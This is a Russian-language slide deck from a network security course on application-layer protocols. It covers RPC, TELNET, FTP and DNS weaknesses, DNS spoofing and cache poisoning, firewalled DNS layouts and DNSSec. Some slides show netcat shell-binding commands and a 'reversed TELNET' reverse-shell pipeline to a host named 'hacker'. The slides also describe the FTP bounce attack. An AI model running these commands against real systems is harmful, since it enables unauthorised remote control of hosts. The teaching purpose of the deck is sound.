Презентация на тему "Протоколы прикладного уровня"

Презентация: Протоколы прикладного уровня
Включить эффекты
1 из 55
Ваша оценка презентации
Оцените презентацию по шкале от 1 до 5 баллов
  • 1
  • 2
  • 3
  • 4
  • 5
4.0
1 оценка

Комментарии

Нет комментариев для данной презентации

Помогите другим пользователям — будьте первым, кто поделится своим мнением об этой презентации.


Добавить свой комментарий

Аннотация к презентации

Посмотреть и скачать презентацию по теме "Протоколы прикладного уровня" по информатике, включающую в себя 55 слайдов. Скачать файл презентации 1.05 Мб. Средняя оценка: 4.0 балла из 5. Для студентов. Большой выбор учебных powerpoint презентаций по информатике

Содержание

  • Презентация: Протоколы прикладного уровня
    Слайд 1

    Протоколы прикладного уровня Раздел 2 – Тема 15

  • Слайд 2

    Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня Уровень сетевого взаимодействия

  • Слайд 3

    Удалённый вызов процедур Канальный уровень Физический уровень Сетевой уровень Транспортный уровень Уровень соединения Уровень представления Уровень приложения 7 6 5 4 3 2 1 Ethernet, FDDI, X.25 и другие Сетевой уровень IP TCP, UDP RPC

  • Слайд 4

    Клиент Сервер RPC Протокол RPC Спецификация RPC-сервера Номер программы Номер процедуры Номер версии

  • Слайд 5

    Клиент Сервер RPC Запрос клиента Спецификация RPC-сервера Номер программы Номер процедуры Номер версии Номер порта

  • Слайд 6

    Клиент Сервер RPC Номер процедуры RPC-сканирование Номер порта Примеры утилит для RPC-сканирования RPCScan (Linux) rpcdump (Windows)

  • Слайд 7

    Клиент (утилита telnet) Сервер (telnetd) Протокол обмена TELNET Протокол удалённого терминала - TELNET

  • Слайд 8

    Взаимодействие «терминал-удалённый процесс» Терминал – Серверный процесс $a a a a

  • Слайд 9

    Команды протокола TELNET Управляющий символ IAC Команда Параметры Interpret as Command, равен 255 Например, клавиша Backspace, 247 1 байт 1 байт 1 байт

  • Слайд 10

    Команды протокола TELNET Название команды Код Описание команды IP (Interrupt Process) 244 Прерывание процесса пользователя AO (Abort Output) 245 Остановка вывода на дисплей AYT (Are You There) 246 Проверка состояния системы EC (Erase Character) 247 Удаление последнего введённого символа EL (Erase Line) 248 Удаление текущей строки

  • Слайд 11

    Передача команд $a IAC EC Backspace $

  • Слайд 12

    Клиент (утилита telnet) Сервер (telnetd) Передача имени и пароля в открытом виде Уязвимости протокола TELNET

  • Слайд 13

    Изменение переменных окружения до аутентификации Уязвимости протокола TELNET Клиент (утилита telnet) Сервер (telnetd)

  • Слайд 14

    Что такое Netcat? Netcat - это утилита, которая позволяет читать и записывать данные по сети с использованием протоколов TCP или UDP. Возможности netcat : Работа с входящими и исходящими TCP или UDP соединениями, использующими любые порты Выполнение DNS запросов различных типов Возможность задания порта источника Возможность использования любого адреса источника (из локально сконфигурированных) Возможности по сканированию портов Работа в качестве telnet-сервера

  • Слайд 15

    Netcat и Telnet - клиент Telnet - клиентимеет ограничения, преодолеть которые поможет Netcat. Например: Ограничения стандартного потока ввода Посылка сообщений об ошибках в стандартный поток вывода, вместе с данными Невозможность посылки двоичных данных Невозможность находиться в состоянии ожидания соединения Невозможность работы с UDP

  • Слайд 16

    Режимы работы Netcat Режим исходящих соединений Режим ожидания входящих соединений Слушающий порт nc [-опции] порт[ы] nc –l –p [-опции] [узел] [порт]

  • Слайд 17

    Варианты использования Netcat Подключение к слушающему портуна удаленном узле Подключение с явным указанием порта источника nc 200.2.2.222 80 nc –p 53 200.2.2.222 80 53 200.2.2.222 80 200.2.2.222

  • Слайд 18

    Варианты использования Netcat Открытие порта и подключение оболочки к нему nc –e /bin/bash nc –e cmd.exe Вариант для Linux Вариант для Windows

  • Слайд 19

    «Обращённый» TELNET Это управление узлом через соединение, инициируемое с него самого

  • Слайд 20

    «Обращённый» TELNET 80 25 > telnet hacker 80 | /bin/bash | telnet hacker 25 /bin/bash Команды Результаты

  • Слайд 21

    Практическая работа 18 Утилита Netcat «Обращённый» TELNET

  • Слайд 22

    Клиент Сервер Команды Ответы Реализация службы FTP Интерфейс пользователя Модуль управления передачей Модуль передачи данных Данные Модуль управления передачей Модуль передачи данных

  • Слайд 23

    Пассивный вариант работы FTP Клиент Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) Открытие соединения на указанный порт

  • Слайд 24

    Предсказуемый номер порта Клиент Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) Открытие соединения на указанный порт Подключение раньше клиента

  • Слайд 25

    Открытие большого количества портов Сервер (ftpd) команда PASV Ответ с параметрами (номер порта для подключения) команда PASV Ответ с параметрами (номер порта для подключения) команда PASV Ответ с параметрами (номер порта для подключения)

  • Слайд 26

    Передача данных между двумя FTP-серверами Сервер (ftpd) Сервер (ftpd) Передача большого количества данных Управляющее соединение

  • Слайд 27

    Атаки на сетевые службы при помощи FTP Сервер FTP Почтовый сервер Подключение с FTP-сервера PORT 20,1,1,1,0,25 RETR 20.1.1.1 25

  • Слайд 28

    telnet www.microsoft.com Resolver www.microsoft.com - ? 100.0.0.6 DNS Server DNS - служба

  • Слайд 29

    Домены и поддомены « » org edu com company sale buhg Root Name Server company.com Name Server sale.company.com Name Server

  • Слайд 30

    Записи Resource Record main.sale.company.com. IN A 100.0.0.120 sale sale.company.com Name Server sale.company.com. IN NS ns.sale.company.com

  • Слайд 31

    Разрешение имён R e s o l v e r main.sale.company.com - ? main.sale.company.com - ? main.sale.company.com - ? main.sale.company.com - ? com Name Server Root Server company.com NS sale.company.com NS

  • Слайд 32

    Применение транспортного протокола без установления соединения (UDP) Отсутствие идентификации и аутентификации Отсутствие средств разграничения доступа Уязвимости службы DNS

  • Слайд 33

    Пример атаки на IP - сеть: Атака на DNS Нарушение нормального функционирования объекта атаки Местонахождение атакующего В одном сегменте с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высокая Нарушение навигации (ложный маршрут) Механизм реализации

  • Слайд 34

    Схема работы DNS - протокола DNS-сервер Хост А IP - адрес ID Имя компьютера SourcePort DNS-запрос DNS-ответ ID - генерируется приложением, пославшим запрос, обычно=1 SourcePort вначале принимает значение 1024 а потом увеличивается Пример атаки на IP - сеть: Атака на DNS

  • Слайд 35

    DNS-сервер Хост А ID Имя компьютера SourcePort DNS-запрос Хост А посылает DNS - запрос Нарушитель должен находиться в одной подсети с А или в одной подсети с DNS - сервером Это позволит ему перехватить пакет с запросом Пример атаки на IP - сеть: Атака на DNS

  • Слайд 36

    DNS-сервер Хост А DNS-запрос Нарушитель извлекает из запроса ID и SourcePort Ложный DNS - ответ: от имени настоящего DNS - сервера, но в качестве IP - адреса искомого узла указывается IP - адрес нарушителя Результат: хост А имеет неправильное соответствие между именем компьютера и IP - адресом Пример атаки на IP - сеть: Атака на DNS

  • Слайд 37

    Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS

  • Слайд 38

    Пример атаки на IP - сеть: Атака на DNS (вариант 2) Нарушение нормального функционирования объекта атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высокая Нарушение навигации (ложный маршрут) Механизм реализации

  • Слайд 39

    DNS-сервер Хост А ID IP - адрес DestPort Ложные DNS - ответы Перебор Пример атаки на IP - сеть: Атака на DNS (вариант 2)

  • Слайд 40

    DNS-сервер Хост А Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 2)

  • Слайд 41

    Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS (вариант 2)

  • Слайд 42

    DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица DNS-сервер следующего уровня DNS-запрос DNS-ответ 194.154.77.109 www.infosec.ru Пример атаки на IP - сеть: Атака на DNS (вариант 3)

  • Слайд 43

    DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица DNS-сервер следующего уровня DNS-запрос 194.154.77.123 www.infosec.ru Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 3)

  • Слайд 44

    DNS-сервер 193.233.70.129 ertr.mpei.ac.ru . . Кэш - таблица 194.154.77.123 www.infosec.ru Хост А 194.154.77.123 www.infosec.ru DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)

  • Слайд 45

    DNS в корпоративной сети Внешний узел Вторичный сервер Внутренний узел Первичный сервер Репликация Рекурсивный запрос Рекурсивные запросы Итеративные запросы DNS DNS

  • Слайд 46

    DNS в корпоративной сети Доступ узлов корпоративной сети к полной информации о внутренних именах Доступ отдельных узлов корпоративной сети к глобальному пространству имён Internet Доступ внешних узлов к минимально необходимой информации о внутренних именах

  • Слайд 47

    Двухсерверная конфигурация Внешний узел Вторичный сервер Внутренний узел Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия) DNS DNS DNS

  • Слайд 48

    Трехсерверная конфигурация Внешний узел Вторичный сервер (минимальная версия) Внутренний узел (с Internet) Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия+корень) DNS DNS DNS DNS Вторичный сервер (полная версия) Внутренний узел (без Internet)

  • Слайд 49

    Трёхсерверная конфигурация Первичный сервер (минимальная версия) Межсетевой экран Первичный сервер (полная версия) +корень DNS DNS DNS Вторичный сервер (полная версия) Internet

  • Слайд 50

    Протокол DNSSec Механизм распределения открытых ключей Целостность и аутентичность информации DNS Аутентификация транзакции

  • Слайд 51

    Новые записи Resource Record main.sale.company.com. IN A 100.0.0.120 sale.company.com. IN NS ns.sale.company.com sale.company.com. IN KEY [ключ] sale.company.com. IN SIG [подпись] sale.company.com. IN NXT [домен]

  • Слайд 52

    Обычный DNS-запрос qname=main.sale.company.com qtype=A main.sale.company.com A 100.0.0.120 Владелец sale.company.com NS ns.sale.company.com Дополнительно ns.sale.company.com A 100.0.1.130 Запрос Ответ

  • Слайд 53

    Запрос DNSSec qname=main.sale.company.com qtype=A Вопрос main.sale.company.com A ? main.sale.company.com A 100.0.0.120 main.sale.company.com SIG [подпись] Владелец sale.company.com NS ns.sale.company.com sale.company.com SIG [подпись] Дополнительно ns.sale.company.com A 100.0.1.130 ns.sale.company.com SIG [подпись] sale.company.com KEY [ключ] main.sale.company.com KEY [ключ] ns.sale.company.com KEY [ключ] Запрос Ответ

  • Слайд 54

    Практическая работа 19 Просмотр и запись сессий TELNET и FTP при помощи RealSecure Настройка пользовательских событий для RealSecure

  • Слайд 55

    Раздел 2 – Итоги Модель OSI. Архитектура TCP/IP. Сетевые анализаторы. Программа Internet Scanner. Межсетевые экраны. Протоколы IPSec, SSL, SSH, DNSSec Система обнаружения атак RealSecure. Cлужбы прикладного уровня.

Посмотреть все слайды

Сообщить об ошибке